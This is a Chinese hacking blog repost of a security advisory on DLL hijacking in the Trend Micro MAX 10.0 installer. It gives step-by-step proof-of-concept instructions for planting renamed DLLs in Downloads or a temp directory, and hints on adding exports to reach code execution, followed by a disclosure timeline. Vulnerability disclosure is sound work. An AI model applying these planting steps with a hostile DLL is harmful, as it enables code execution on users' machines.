注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[提权]杀毒软件Trend Micro DLL hijacking  

2016-04-19 17:25:47|  分类: 提权工具 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
TrendMicro_MAX_10.0_US-en_Downloader.exe (available from
<http://trial.trendmicro.com/US/TM/2016/TrendMicro_MAX_10.0_US-en_Downloader.exe>)
loads and executes ProfAPI.dll and UXTheme.dll (and other DLLs
too) eventually found in the directory it is started from
(the "application directory").

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>
and <http://seclists.org/fulldisclosure/2012/Aug/134>

If one of the DLLs named above gets planted in the user's
"Downloads" directory per "drive-by download" or "social
engineering" this vulnerability becomes a remote code execution.


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. visit <http://home.arcor.de/skanthak/sentinel.html>, download
   <http://home.arcor.de/skanthak/download/SENTINEL.DLL>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   ProfAPI.dll;

2. download TrendMicro_MAX_10.0_US-en_Downloader.exe and save it
   in your "Downloads" directory;

3. execute TrendMicro_MAX_10.0_US-en_Downloader.exe from your
   "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.

PWNED!


For a denial of service instead of arbitrary (remote) code execution
copy the downloaded UXTheme.dll as OLEAcc.dll and WinSpool.drv.
This is easily turned into arbitrary (remote) code execution too:
just add the exports OpenPrinterW, ClosePrinter and DocumentPropertiesW
respectively LresultFromObject and CreateStdAccessibleObject to the DLL.


See <http://seclists.org/fulldisclosure/2015/Nov/101> and
<http://seclists.org/fulldisclosure/2015/Dec/86> as well as
<http://home.arcor.de/skanthak/sentinel.html> and the still unfinished
<http://home.arcor.de/skanthak/!execute.html> for more details about
this well-known and well-documented BEGINNER'S error and why
executable installers (and self-extractors too) are bad.


Additionally, TrendMicro_MAX_10.0_US-en_Downloader.exe creates an
unsafe temporary directory where it unpacks its payload to and 
executes it from.

...TrendMicro_MAX_10.0_US-en_DownloaderAgentTisEzIns.exe loads
and executes multiple DLLs too from its unsafe application directory:
ProfAPI.dll, NTMarta.dll, RASAdHlp.dll, NTShrUI.dll, UXTheme.dll and
Secur32.dll plus WinMM.dll, Version.dll, WinSpool.drv, WinHttp.dll
and OLEAcc.dll


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5. unpack TrendMicro_MAX_10.0_US-en_Downloader.exe (basically a
   7-Zip self-extractor) into an arbitrary directory, say "%TEMP%"
   (this creates a subdirectory "%TEMP%Agent" with the payload);

6. copy the downloaded UXTheme.dll from step 1 into "%TEMP%Agent",
   then copy it as ProfAPI.dll, NTMarta.dll, RASAdHlp.dll, NTShrUI.dll,
   Secur32.dll plus WinMM.dll, Version.dll, WinSpool.drv, WinHttp.dll
   and OLEAcc.dll there;

7. execute "%TEMP%AgentTisEZIns.exe";

8. notice the message boxes displayed from the DLLs placed in steps 5
   and 6.

PWNED!


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2015-12-20    multiple reports sent to vendor

2015-12-20    one report bounced due to braindead mail setup by vendor

2015-12-20    resent bounced report via alternative provider

2015-12-21    vendor acknowledges receipt and names further contact

2015-12-28    vendor verifies reports, can reproduce it on Windows 7

2015-12-30    vendor asks for verification:
              "We did not reproduce the vulnerability relating to
               ProfAPI.dll and UXTheme.dll on Windows 7."

2015-12-31    sent verification to vendor

2015-12-31    bounced due to braindead mail setup by vendor

<[email protected]>: host
    support.trendmicro.com.e0018.g0009.ng0090.im.emailsecurity.trendmicro.com[150.70.178.57]
    said: 554 5.7.1 <[email protected]>: Recipient address
    rejected: ERS-RBL. (in reply to RCPT TO command)

<[email protected]>: host sjdc-itpf-04.udc.trendmicro.com[66.180.82.132]
    said: 550 5.7.1 Service unavailable; Client host [151.189.21.43] blocked
    using Trend Micro RBL+. Please see
    http://www.mail-abuse.com/cgi-bin/lookup?ip_address=151.189.21.43; Mail
    from 151.189.21.43 blocked using Trend Micro Email Reputation database.
    Please see <http://www.mail-abuse.com/cgi-bin/lookup?151.189.21.43>;
    from=<<[email protected]> ; SIZE=8184> to=<<[email protected]>
    ; ORCPT=rfc822;[email protected]> proto=ESMTP
    helo=<mail-in-03.arcor-online.net> (in reply to end of DATA command)

2015-12-31    report published: vendor is obviously not interested in communication
  评论这张
 
阅读(1294)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016